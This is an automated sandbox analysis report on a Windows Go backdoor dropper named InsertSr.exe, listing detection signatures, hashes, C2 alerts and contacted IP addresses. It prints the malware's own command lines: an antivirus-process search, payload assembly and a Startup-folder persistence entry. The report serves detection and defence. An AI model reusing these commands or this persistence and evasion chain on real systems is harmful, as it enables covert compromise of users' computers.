Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
InsertSr.exe

Overview

General Information

Sample name:InsertSr.exe
Analysis ID:1565338
MD5:c4c26460f0f0fc5f6acb5a9dca7d251c
SHA1:5a9a4337d0159af2d23457a396ebc4db5114aabf
SHA256:68da2cf9516fa5b50b96c7b63d3fab3149497226c3ee7b444f5be1d292df4a20
Tags:exesolvolume-funuser-aachum
Infos:

Detection

GO Backdoor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
Drops PE files with a suspicious file extension
Found Tor onion address
Injects a PE file into a foreign processes
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • InsertSr.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\InsertSr.exe" MD5: C4C26460F0F0FC5F6ACB5A9DCA7D251C)
    • cmd.exe (PID: 6732 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5012 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4052 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5824 cmdline: cmd /c md 316094 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5840 cmdline: findstr /V "SequenceOctoberContributionRef" Recreation MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6864 cmdline: cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Intranet.pif (PID: 6448 cmdline: Intranet.pif u MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 6464 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Intranet.pif (PID: 1292 cmdline: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • choice.exe (PID: 2036 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 5204 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Virtuoso.scr (PID: 3748 cmdline: "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • Virtuoso.scr (PID: 2404 cmdline: "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Intranet.pif PID: 1292JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: Virtuoso.scr PID: 2404JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine|base64offset|contains: *', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , ProcessId: 5204, ProcessName: wscript.exe
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Intranet.pif u, CommandLine: Intranet.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: Intranet.pif u, ProcessId: 6448, ProcessName: Intranet.pif
      Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, ProcessId: 6448, TargetFilename: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\InsertSr.exe", ParentImage: C:\Users\user\Desktop\InsertSr.exe, ParentProcessId: 6552, ParentProcessName: InsertSr.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, ProcessId: 6732, ProcessName: cmd.exe
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, ProcessId: 6448, TargetFilename: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine|base64offset|contains: *', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , ProcessId: 5204, ProcessName: wscript.exe

      Data Obfuscation

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 4052, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-29T16:25:40.862913+010028555361A Network Trojan was detected192.168.2.649730109.172.87.13522016TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-29T16:26:09.536154+010028555371A Network Trojan was detected192.168.2.649730109.172.87.13522016TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-29T16:26:09.968816+010028555381A Network Trojan was detected109.172.87.13522016192.168.2.649730TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-29T16:25:40.860487+010028555391A Network Trojan was detected109.172.87.13522016192.168.2.649730TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: InsertSr.exeReversingLabs: Detection: 15%
      Source: InsertSr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: InsertSr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00504005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00504005
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0050C2FF
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0050494A
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050CD14 FindFirstFileW,FindClose,19_2_0050CD14
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0050CD9F
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0050F5D8
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0050F735
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0050FA36
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00503CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00503CE2
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_001E4005
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_001EC2FF
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E494A GetFileAttributesW,FindFirstFileW,FindClose,22_2_001E494A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ECD14 FindFirstFileW,FindClose,22_2_001ECD14
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_001ECD9F
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_001EF5D8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_001EF735
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_001EFA36
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_001E3CE2
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\316094\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\316094Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.87.135:22016 -> 192.168.2.6:49730
      Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.6:49730 -> 109.172.87.135:22016
      Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.6:49730 -> 109.172.87.135:22016
      Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.87.135:22016 -> 192.168.2.6:49730
      Source: Intranet.pif, 00000013.00000002.3380744209.0000000000C00000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: Virtuoso.scr, 00000016.00000002.3380712170.0000000000A00000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: global trafficTCP traffic: 192.168.2.6:49730 -> 109.172.87.135:22016
      Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
      Source: Joe Sandbox ViewIP Address: 188.130.206.243 188.130.206.243
      Source: Joe Sandbox ViewASN Name: SUMTEL-AS-RIPEMoscowRussiaRU SUMTEL-AS-RIPEMoscowRussiaRU
      Source: unknownDNS traffic detected: query: qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_005129BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_005129BA
      Source: global trafficDNS traffic detected: DNS query: qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi
